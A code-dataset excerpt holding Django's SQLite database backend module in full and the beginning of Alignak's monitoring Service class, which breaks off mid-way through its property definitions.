repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
deployed/django | django/db/backends/sqlite3/base.py | 6 | 23478 | """
SQLite3 backend for django.
Works with either the pysqlite2 module or the sqlite3 module in the
standard library.
"""
from __future__ import unicode_literals
import datetime
import decimal
import warnings
import re
from django.conf import settings
from django.db import utils
from django.db.backends import (utils as backend_utils, BaseDatabaseFeatures,
BaseDatabaseOperations, BaseDatabaseWrapper, BaseDatabaseValidation)
from django.db.backends.sqlite3.client import DatabaseClient
from django.db.backends.sqlite3.creation import DatabaseCreation
from django.db.backends.sqlite3.introspection import DatabaseIntrospection
from django.db.backends.sqlite3.schema import DatabaseSchemaEditor
from django.db.models import fields
from django.db.models.sql import aggregates
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes
from django.utils import six
from django.utils import timezone
try:
try:
from pysqlite2 import dbapi2 as Database
except ImportError:
from sqlite3 import dbapi2 as Database
except ImportError as exc:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading either pysqlite2 or sqlite3 modules (tried in that order): %s" % exc)
try:
import pytz
except ImportError:
pytz = None
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
def adapt_datetime_with_timezone_support(value):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("SQLite received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return value.isoformat(str(" "))
def decoder(conv_func):
""" The Python sqlite3 interface returns always byte strings.
This function converts the received value to a regular string before
passing it to the receiver function.
"""
return lambda s: conv_func(s.decode('utf-8'))
Database.register_converter(str("bool"), decoder(lambda s: s == '1'))
Database.register_converter(str("time"), decoder(parse_time))
Database.register_converter(str("date"), decoder(parse_date))
Database.register_converter(str("datetime"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("timestamp"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("TIMESTAMP"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("decimal"), decoder(backend_utils.typecast_decimal))
Database.register_adapter(datetime.datetime, adapt_datetime_with_timezone_support)
Database.register_adapter(decimal.Decimal, backend_utils.rev_typecast_decimal)
if six.PY2:
Database.register_adapter(str, lambda s: s.decode('utf-8'))
Database.register_adapter(SafeBytes, lambda s: s.decode('utf-8'))
class DatabaseFeatures(BaseDatabaseFeatures):
# SQLite cannot handle us only partially reading from a cursor's result set
# and then writing the same rows to the database in another cursor. This
# setting ensures we always read result sets fully into memory all in one
# go.
can_use_chunked_reads = False
test_db_allows_multiple_connections = False
supports_unspecified_pk = True
supports_timezones = False
supports_1000_query_parameters = False
supports_mixed_date_datetime_comparisons = False
has_bulk_insert = True
can_combine_inserts_with_and_without_auto_increment_pk = False
supports_foreign_keys = False
supports_check_constraints = False
autocommits_when_autocommit_is_off = True
atomic_transactions = False
supports_paramstyle_pyformat = False
supports_sequence_reset = False
@cached_property
def uses_savepoints(self):
return Database.sqlite_version_info >= (3, 6, 8)
@cached_property
def supports_stddev(self):
"""Confirm support for STDDEV and related stats functions
SQLite supports STDDEV as an extension package; so
connection.ops.check_aggregate_support() can't unilaterally
rule out support for STDDEV. We need to manually check
whether the call works.
"""
with self.connection.cursor() as cursor:
cursor.execute('CREATE TABLE STDDEV_TEST (X INT)')
try:
cursor.execute('SELECT STDDEV(*) FROM STDDEV_TEST')
has_support = True
except utils.DatabaseError:
has_support = False
cursor.execute('DROP TABLE STDDEV_TEST')
return has_support
@cached_property
def has_zoneinfo_database(self):
return pytz is not None
class DatabaseOperations(BaseDatabaseOperations):
def bulk_batch_size(self, fields, objs):
"""
SQLite has a compile-time default (SQLITE_LIMIT_VARIABLE_NUMBER) of
999 variables per query.
If there is just single field to insert, then we can hit another
limit, SQLITE_MAX_COMPOUND_SELECT which defaults to 500.
"""
limit = 999 if len(fields) > 1 else 500
return (limit // len(fields)) if len(fields) > 0 else len(objs)
def check_aggregate_support(self, aggregate):
bad_fields = (fields.DateField, fields.DateTimeField, fields.TimeField)
bad_aggregates = (aggregates.Sum, aggregates.Avg,
aggregates.Variance, aggregates.StdDev)
if (isinstance(aggregate.source, bad_fields) and
isinstance(aggregate, bad_aggregates)):
raise NotImplementedError(
'You cannot use Sum, Avg, StdDev and Variance aggregations '
'on date/time fields in sqlite3 '
'since date/time is saved as text.')
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_date_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, sql, connector, timedelta):
# It would be more straightforward if we could use the sqlite strftime
# function, but it does not allow for keeping six digits of fractional
# second information, nor does it allow for formatting date and datetime
# values differently. So instead we register our own function that
# formats the datetime combined with the delta in a manner suitable
# for comparisons.
return 'django_format_dtdelta(%s, "%s", "%d", "%d", "%d")' % (sql,
connector, timedelta.days, timedelta.seconds, timedelta.microseconds)
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def datetime_extract_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_extract_sql.
if settings.USE_TZ:
if pytz is None:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("This query requires pytz, "
"but it isn't installed.")
return "django_datetime_extract('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_trunc_sql.
if settings.USE_TZ:
if pytz is None:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("This query requires pytz, "
"but it isn't installed.")
return "django_datetime_trunc('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return "NULL"
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
def value_to_db_datetime(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = value.astimezone(timezone.utc).replace(tzinfo=None)
else:
raise ValueError("SQLite backend does not support timezone-aware datetimes when USE_TZ is False.")
return six.text_type(value)
def value_to_db_time(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
raise ValueError("SQLite backend does not support timezone-aware times.")
return six.text_type(value)
def convert_values(self, value, field):
"""SQLite returns floats when it should be returning decimals,
and gets dates and datetimes wrong.
For consistency with other backends, coerce when required.
"""
if value is None:
return None
internal_type = field.get_internal_type()
if internal_type == 'DecimalField':
return backend_utils.typecast_decimal(field.format_number(value))
elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
return int(value)
elif internal_type == 'DateField':
return parse_date(value)
elif internal_type == 'DateTimeField':
return parse_datetime_with_timezone_support(value)
elif internal_type == 'TimeField':
return parse_time(value)
# No field, or the field isn't known to be a decimal or integer
return value
def bulk_insert_sql(self, fields, num_values):
res = []
res.append("SELECT %s" % ", ".join(
"%%s AS %s" % self.quote_name(f.column) for f in fields
))
res.extend(["UNION ALL SELECT %s" % ", ".join(["%s"] * len(fields))] * (num_values - 1))
return " ".join(res)
def combine_expression(self, connector, sub_expressions):
# SQLite doesn't have a power function, so we fake it with a
# user-defined function django_power that's registered in connect().
if connector == '^':
return 'django_power(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'sqlite'
# SQLite requires LIKE statements to include an ESCAPE clause if the value
# being escaped has a percent or underscore in it.
# See http://www.sqlite.org/lang_expr.html for an explanation.
operators = {
'exact': '= %s',
'iexact': "LIKE %s ESCAPE '\\'",
'contains': "LIKE %s ESCAPE '\\'",
'icontains': "LIKE %s ESCAPE '\\'",
'regex': 'REGEXP %s',
'iregex': "REGEXP '(?i)' || %s",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE %s ESCAPE '\\'",
'endswith': "LIKE %s ESCAPE '\\'",
'istartswith': "LIKE %s ESCAPE '\\'",
'iendswith': "LIKE %s ESCAPE '\\'",
}
pattern_ops = {
'startswith': "LIKE %s || '%%%%'",
'istartswith': "LIKE UPPER(%s) || '%%%%'",
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
kwargs = {
'database': settings_dict['NAME'],
'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES,
}
kwargs.update(settings_dict['OPTIONS'])
# Always allow the underlying SQLite connection to be shareable
# between multiple threads. The safe-guarding will be handled at a
# higher level by the `BaseDatabaseWrapper.allow_thread_sharing`
# property. This is necessary as the shareability is disabled by
# default in pysqlite and it cannot be changed once a connection is
# opened.
if 'check_same_thread' in kwargs and kwargs['check_same_thread']:
warnings.warn(
'The `check_same_thread` option was provided and set to '
'True. It will be overridden with False. Use the '
'`DatabaseWrapper.allow_thread_sharing` property instead '
'for controlling thread shareability.',
RuntimeWarning
)
kwargs.update({'check_same_thread': False})
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.create_function("django_date_extract", 2, _sqlite_date_extract)
conn.create_function("django_date_trunc", 2, _sqlite_date_trunc)
conn.create_function("django_datetime_extract", 3, _sqlite_datetime_extract)
conn.create_function("django_datetime_trunc", 3, _sqlite_datetime_trunc)
conn.create_function("regexp", 2, _sqlite_regexp)
conn.create_function("django_format_dtdelta", 5, _sqlite_format_dtdelta)
conn.create_function("django_power", 2, _sqlite_power)
return conn
def init_connection_state(self):
pass
def create_cursor(self):
return self.connection.cursor(factory=SQLiteCursorWrapper)
def close(self):
self.validate_thread_sharing()
# If database is in memory, closing the connection destroys the
# database. To prevent accidental data loss, ignore close requests on
# an in-memory db.
if self.settings_dict['NAME'] != ":memory:":
BaseDatabaseWrapper.close(self)
def _savepoint_allowed(self):
# Two conditions are required here:
# - A sufficiently recent version of SQLite to support savepoints,
# - Being in a transaction, which can only happen inside 'atomic'.
# When 'isolation_level' is not None, sqlite3 commits before each
# savepoint; it's a bug. When it is None, savepoints don't make sense
# because autocommit is enabled. The only exception is inside 'atomic'
# blocks. To work around that bug, on SQLite, 'atomic' starts a
# transaction explicitly rather than simply disable autocommit.
return self.features.uses_savepoints and self.in_atomic_block
def _set_autocommit(self, autocommit):
if autocommit:
level = None
else:
# sqlite3's internal default is ''. It's different from None.
# See Modules/_sqlite/connection.c.
level = ''
# 'isolation_level' is a misleading API.
# SQLite always runs at the SERIALIZABLE isolation level.
self.connection.isolation_level = level
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign key references. This method is
intended to be used in conjunction with `disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint checks were off.
Raises an IntegrityError on the first invalid foreign key reference encountered (if any) and provides
detailed information about the invalid reference in the error message.
Backends can override this method if they can more directly apply constraint checking (e.g. via "SET CONSTRAINTS
ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0], table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
return True
def _start_transaction_under_autocommit(self):
"""
Start a transaction explicitly in autocommit mode.
Staying in autocommit mode works around a bug of sqlite3 that breaks
savepoints when autocommit is disabled.
"""
self.cursor().execute("BEGIN")
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
return DatabaseSchemaEditor(self, *args, **kwargs)
FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s')
class SQLiteCursorWrapper(Database.Cursor):
"""
Django uses "format" style placeholders, but pysqlite2 uses "qmark" style.
This fixes it -- but note that if you want to use a literal "%s" in a query,
you'll need to use "%%s".
"""
def execute(self, query, params=None):
if params is None:
return Database.Cursor.execute(self, query)
query = self.convert_query(query)
return Database.Cursor.execute(self, query, params)
def executemany(self, query, param_list):
query = self.convert_query(query)
return Database.Cursor.executemany(self, query, param_list)
def convert_query(self, query):
return FORMAT_QMARK_REGEX.sub('?', query).replace('%%', '%')
def _sqlite_date_extract(lookup_type, dt):
if dt is None:
return None
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_date_trunc(lookup_type, dt):
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'year':
return "%i-01-01" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i" % (dt.year, dt.month, dt.day)
def _sqlite_datetime_extract(lookup_type, dt, tzname):
if dt is None:
return None
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if tzname is not None:
dt = timezone.localtime(dt, pytz.timezone(tzname))
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_datetime_trunc(lookup_type, dt, tzname):
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if tzname is not None:
dt = timezone.localtime(dt, pytz.timezone(tzname))
if lookup_type == 'year':
return "%i-01-01 00:00:00" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01 00:00:00" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day)
elif lookup_type == 'hour':
return "%i-%02i-%02i %02i:00:00" % (dt.year, dt.month, dt.day, dt.hour)
elif lookup_type == 'minute':
return "%i-%02i-%02i %02i:%02i:00" % (dt.year, dt.month, dt.day, dt.hour, dt.minute)
elif lookup_type == 'second':
return "%i-%02i-%02i %02i:%02i:%02i" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
def _sqlite_format_dtdelta(dt, conn, days, secs, usecs):
try:
dt = backend_utils.typecast_timestamp(dt)
delta = datetime.timedelta(int(days), int(secs), int(usecs))
if conn.strip() == '+':
dt = dt + delta
else:
dt = dt - delta
except (ValueError, TypeError):
return None
# typecast_timestamp returns a date or a datetime without timezone.
# It will be formatted as "%Y-%m-%d" or "%Y-%m-%d %H:%M:%S[.%f]"
return str(dt)
def _sqlite_regexp(re_pattern, re_string):
return bool(re.search(re_pattern, force_text(re_string))) if re_string is not None else False
def _sqlite_power(x, y):
return x ** y
| bsd-3-clause | 4,698,769,421,483,548,000 | 40.407407 | 120 | 0.639152 | false |
ddurieux/alignak | alignak/objects/service.py | 1 | 80937 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Hartmut Goebel, [email protected]
# Andreas Karfusehr, [email protected]
# aviau, [email protected]
# Nicolas Dupeux, [email protected]
# François Lafont, [email protected]
# Sebastien Coavoux, [email protected]
# Demelziraptor, [email protected]
# Jean Gabes, [email protected]
# Romain Forlot, [email protected]
# Arthur Gautier, [email protected]
# Frédéric MOHIER, [email protected]
# Frédéric Pégé, [email protected]
# Guillaume Bour, [email protected]
# Jean-Charles, [email protected]
# Jan Ulferts, [email protected]
# Grégory Starck, [email protected]
# Andrew McGilvray, [email protected]
# Christophe Simon, [email protected]
# Pradeep Jindal, [email protected]
# Hubert, [email protected]
# Alexander Springer, [email protected]
# Olivier Hanesse, [email protected]
# Gerhard Lausser, [email protected]
# Christophe SIMON, [email protected]
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
""" This Class is the service one, s it manage all service specific thing.
If you look at the scheduling part, look at the scheduling item class"""
import time
import re
import itertools
try:
from ClusterShell.NodeSet import NodeSet, NodeSetParseRangeError
except ImportError:
NodeSet = None
from alignak.objects.item import Items
from alignak.objects.schedulingitem import SchedulingItem
from alignak.autoslots import AutoSlots
from alignak.util import strip_and_uniq, format_t_into_dhms_format, to_svc_hst_distinct_lists, \
get_key_value_sequence, GET_KEY_VALUE_SEQUENCE_ERROR_SYNTAX, GET_KEY_VALUE_SEQUENCE_ERROR_NODEFAULT, \
GET_KEY_VALUE_SEQUENCE_ERROR_NODE, to_list_string_of_names, to_list_of_names, to_name_if_possible, \
is_complex_expr
from alignak.property import BoolProp, IntegerProp, FloatProp,\
CharProp, StringProp, ListProp, DictProp
from alignak.macroresolver import MacroResolver
from alignak.eventhandler import EventHandler
from alignak.log import logger, naglog_result
class Service(SchedulingItem):
# AutoSlots create the __slots__ with properties and
# running_properties names
__metaclass__ = AutoSlots
# Every service have a unique ID, and 0 is always special in
# database and co...
id = 1
# The host and service do not have the same 0 value, now yes :)
ok_up = 'OK'
# used by item class for format specific value like for Broks
my_type = 'service'
# properties defined by configuration
# required: is required in conf
# default: default value if no set in conf
# pythonize: function to call when transforming string to python object
# fill_brok: if set, send to broker. there are two categories:
# full_status for initial and update status, check_result for check results
# no_slots: do not take this property for __slots__
properties = SchedulingItem.properties.copy()
properties.update({
'host_name':
StringProp(fill_brok=['full_status', 'check_result', 'next_schedule']),
'hostgroup_name':
StringProp(default='', fill_brok=['full_status'], merging='join'),
'service_description':
StringProp(fill_brok=['full_status', 'check_result', 'next_schedule']),
'display_name':
StringProp(default='', fill_brok=['full_status']),
'servicegroups':
ListProp(default=[], fill_brok=['full_status'],
brok_transformation=to_list_string_of_names, merging='join'),
'is_volatile':
BoolProp(default=False, fill_brok=['full_status']),
'check_command':
StringProp(fill_brok=['full_status']),
'initial_state':
CharProp(default='o', fill_brok=['full_status']),
'max_check_attempts':
IntegerProp(default=1, fill_brok=['full_status']),
'check_interval':
IntegerProp(fill_brok=['full_status', 'check_result']),
'retry_interval':
IntegerProp(fill_brok=['full_status', 'check_result']),
'active_checks_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'passive_checks_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'check_period':
StringProp(brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'obsess_over_service':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
'check_freshness':
BoolProp(default=False, fill_brok=['full_status']),
'freshness_threshold':
IntegerProp(default=0, fill_brok=['full_status']),
'event_handler':
StringProp(default='', fill_brok=['full_status']),
'event_handler_enabled':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
'low_flap_threshold':
IntegerProp(default=-1, fill_brok=['full_status']),
'high_flap_threshold':
IntegerProp(default=-1, fill_brok=['full_status']),
'flap_detection_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'flap_detection_options':
ListProp(default=['o', 'w', 'c', 'u'], fill_brok=['full_status'], split_on_coma=True),
'process_perf_data':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'retain_status_information':
BoolProp(default=True, fill_brok=['full_status']),
'retain_nonstatus_information':
BoolProp(default=True, fill_brok=['full_status']),
'notification_interval':
IntegerProp(default=60, fill_brok=['full_status']),
'first_notification_delay':
IntegerProp(default=0, fill_brok=['full_status']),
'notification_period':
StringProp(brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'notification_options':
ListProp(default=['w', 'u', 'c', 'r', 'f', 's'],
fill_brok=['full_status'], split_on_coma=True),
'notifications_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'contacts':
ListProp(default=[], brok_transformation=to_list_of_names,
fill_brok=['full_status'], merging='join'),
'contact_groups':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'stalking_options':
ListProp(default=[''], fill_brok=['full_status'], merging='join'),
'notes':
StringProp(default='', fill_brok=['full_status']),
'notes_url':
StringProp(default='', fill_brok=['full_status']),
'action_url':
StringProp(default='', fill_brok=['full_status']),
'icon_image':
StringProp(default='', fill_brok=['full_status']),
'icon_image_alt':
StringProp(default='', fill_brok=['full_status']),
'icon_set':
StringProp(default='', fill_brok=['full_status']),
'failure_prediction_enabled':
BoolProp(default=False, fill_brok=['full_status']),
'parallelize_check':
BoolProp(default=True, fill_brok=['full_status']),
# Alignak specific
'poller_tag':
StringProp(default='None'),
'reactionner_tag':
StringProp(default='None'),
'resultmodulations':
ListProp(default=[], merging='join'),
'business_impact_modulations':
ListProp(default=[], merging='join'),
'escalations':
ListProp(default=[], fill_brok=['full_status'], merging='join', split_on_coma=True),
'maintenance_period':
StringProp(default='',
brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'time_to_orphanage':
IntegerProp(default=300, fill_brok=['full_status']),
'merge_host_contacts':
BoolProp(default=False, fill_brok=['full_status']),
'labels':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'host_dependency_enabled':
BoolProp(default=True, fill_brok=['full_status']),
# BUSINESS CORRELATOR PART
# Business rules output format template
'business_rule_output_template':
StringProp(default='', fill_brok=['full_status']),
# Business rules notifications mode
'business_rule_smart_notifications':
BoolProp(default=False, fill_brok=['full_status']),
# Treat downtimes as acknowledgements in smart notifications
'business_rule_downtime_as_ack':
BoolProp(default=False, fill_brok=['full_status']),
# Enforces child nodes notification options
'business_rule_host_notification_options':
ListProp(default=None, fill_brok=['full_status'], split_on_coma=True),
'business_rule_service_notification_options':
ListProp(default=None, fill_brok=['full_status'], split_on_coma=True),
# Easy Service dep definition
'service_dependencies': # TODO: find a way to brok it?
ListProp(default=None, merging='join', split_on_coma=True),
# service generator
'duplicate_foreach':
StringProp(default=''),
'default_value':
StringProp(default=''),
# Business_Impact value
'business_impact':
IntegerProp(default=2, fill_brok=['full_status']),
# Load some triggers
'trigger':
StringProp(default=''),
'trigger_name':
StringProp(default=''),
'trigger_broker_raise_enabled':
BoolProp(default=False),
# Trending
'trending_policies':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
# Our check ways. By defualt void, but will filled by an inner if need
'checkmodulations':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'macromodulations':
ListProp(default=[], merging='join'),
# Custom views
'custom_views':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
# UI aggregation
'aggregation':
StringProp(default='', fill_brok=['full_status']),
# Snapshot part
'snapshot_enabled':
BoolProp(default=False),
'snapshot_command':
StringProp(default=''),
'snapshot_period':
StringProp(default=''),
'snapshot_criteria':
ListProp(default=['w', 'c', 'u'], fill_brok=['full_status'], merging='join'),
'snapshot_interval':
IntegerProp(default=5),
})
# properties used in the running state
running_properties = SchedulingItem.running_properties.copy()
running_properties.update({
'modified_attributes':
IntegerProp(default=0L, fill_brok=['full_status'], retention=True),
'last_chk':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'next_chk':
IntegerProp(default=0, fill_brok=['full_status', 'next_schedule'], retention=True),
'in_checking':
BoolProp(default=False,
fill_brok=['full_status', 'check_result', 'next_schedule'], retention=True),
'in_maintenance':
IntegerProp(default=None, fill_brok=['full_status'], retention=True),
'latency':
FloatProp(default=0, fill_brok=['full_status', 'check_result'], retention=True,),
'attempt':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'state':
StringProp(default='PENDING',
fill_brok=['full_status', 'check_result'], retention=True),
'state_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'current_event_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_event_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_state':
StringProp(default='PENDING',
fill_brok=['full_status', 'check_result'], retention=True),
'last_state_type':
StringProp(default='HARD', fill_brok=['full_status', 'check_result'], retention=True),
'last_state_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'last_hard_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'last_hard_state':
StringProp(default='PENDING', fill_brok=['full_status'], retention=True),
'last_hard_state_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'last_time_ok':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_warning':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_critical':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_unknown':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'duration_sec':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'state_type':
StringProp(default='HARD', fill_brok=['full_status', 'check_result'], retention=True),
'state_type_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'output':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'long_output':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'is_flapping':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
# dependencies for actions like notif of event handler,
# so AFTER check return
'act_depend_of':
ListProp(default=[]),
# dependencies for checks raise, so BEFORE checks
'chk_depend_of':
ListProp(default=[]),
# elements that depend of me, so the reverse than just upper
'act_depend_of_me':
ListProp(default=[]),
# elements that depend of me
'chk_depend_of_me':
ListProp(default=[]),
'last_state_update':
FloatProp(default=0.0, fill_brok=['full_status'], retention=True),
# no brok because checks are too linked
'checks_in_progress':
ListProp(default=[]),
# no broks because notifications are too linked
'notifications_in_progress': DictProp(default={}, retention=True),
'downtimes':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'comments':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'flapping_changes':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'flapping_comment_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'percent_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'problem_has_been_acknowledged':
BoolProp(default=False, fill_brok=['full_status', 'check_result'], retention=True),
'acknowledgement':
StringProp(default=None, retention=True),
'acknowledgement_type':
IntegerProp(default=1, fill_brok=['full_status', 'check_result'], retention=True),
'check_type':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'has_been_checked':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'should_be_scheduled':
IntegerProp(default=1, fill_brok=['full_status'], retention=True),
'last_problem_id':
